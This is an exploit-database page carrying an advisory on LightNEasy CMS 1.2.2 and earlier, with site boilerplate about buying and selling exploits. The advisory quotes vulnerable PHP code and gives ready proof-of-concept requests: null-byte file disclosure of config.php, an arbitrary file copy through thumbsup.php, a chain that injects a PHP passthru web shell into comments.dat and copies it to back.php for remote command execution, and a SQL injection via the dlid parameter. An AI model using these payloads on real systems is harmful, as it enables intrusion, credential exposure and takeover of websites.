0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LightNEasy SQLite / no database <= 1.2.2 Multiple Remote Vulnerabilities
======================================================================== LightNEasy SQLite / no database <= 1.2.2 Multiple Remote Vulnerabilities ======================================================================== # Author: __GiReX__ # Date: 14/04/08 # CMS: LightNEasy SQLite / no database <= 1.2.2 # Site: lightneasy.org # Advisory: Multiple Remote Vulnerabilities # Need: magic_quotes_gpc = Off magic_quotes_gpc = On / Off for SQL Injections ###################################################################################### # Bug 1: Remote File Disclosure # Affected: SQLite / no database # Get the config.php into HTML (like a comment) # Note config.php not exists in SQLite version # PoC: [host]/[path]/LightNEasy.php?page=config.php%00 ###################################################################################### # Bug 2: Arbitrary file copy and rename / Thumsup v1.12 # Affected: SQLite / no database # This vuln is present in this extern script by Gerd Tentler that is included by default # in LightNEasy # Vuln Code: LightNEasy/thumbsup.php 34. if(isset($_REQUEST['image'])) $image = $_REQUEST['image']; 37. if(isset($_REQUEST['cache_dir'])) $cache_dir = $_REQUEST['cache_dir']; 407. if($image) { if($fp = @fopen($image, 'rb')) { <== $size = filesize($image); <== Unfortunally filesize does not accept remote files $data = fread($fp, $size); <== fclose($fp); $original = "$cache_dir/img_" . md5($image . $size); <== } else $error = 'Could not open'; 414. } 451. if(!file_exists($original)) { if($fp = @fopen($original, 'wb')) { <== fwrite($fp, $data, strlen($data)); <== fclose($fp); 455. } # Note config.php not exists in SQLite version # PoC: [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00 # And then get file disclosure with: # PoC: [host]/[path]/LightNEasy/config.txt ###################################################################################### # Bug 3: Getting a Remote Command Execution # Affected: SQLite / no database # First of all inject PHP Code into comments.dat from $_POST['newsid'] that is not sanizated # Vuln code: LightNEasy/runtime.php 32. if($_POST['submit']=="sendcomment") { ... 42. if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]); 43. fwrite($fp,$_POST['newsid']."|".encode($_POST['commentname'])."|". <== 44. encode($_POST['commentemail'])."|".time()."|".encode(stripslashes($_POST['commentmessage']))."||"); # PoC: If admin has been created some news and page news exists (it can has a different name) POST [host]/[path]/LightNEasy.php?page=news Content-Type: application/x-www-form-urlencoded commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE] &submit=sendcomment&newsid=<?php passthru($_GET['cmd']); ?>/* # Then create a file back.php with the trick of Bug 2 # PoC: [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00 # Finally send remote commands to back.php # PoC: [host]/[path]/back.php?cmd=ls ###################################################################################### # Bug 4: Multiple Remote SQL Injections # Affected: SQLite # Works with magic_quotes_gpc = On / Off # Vuln Code: /LightNEasy/lightneasy.php 237. if(isset($_GET['dlid'])) { $result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET['dlid']); # PoC: [host]/[path]/index.php?dlid=-1 OR 1 # You can find others more SQL Injections by yourself ###################################################################################### # 0day.today [2024-12-25] #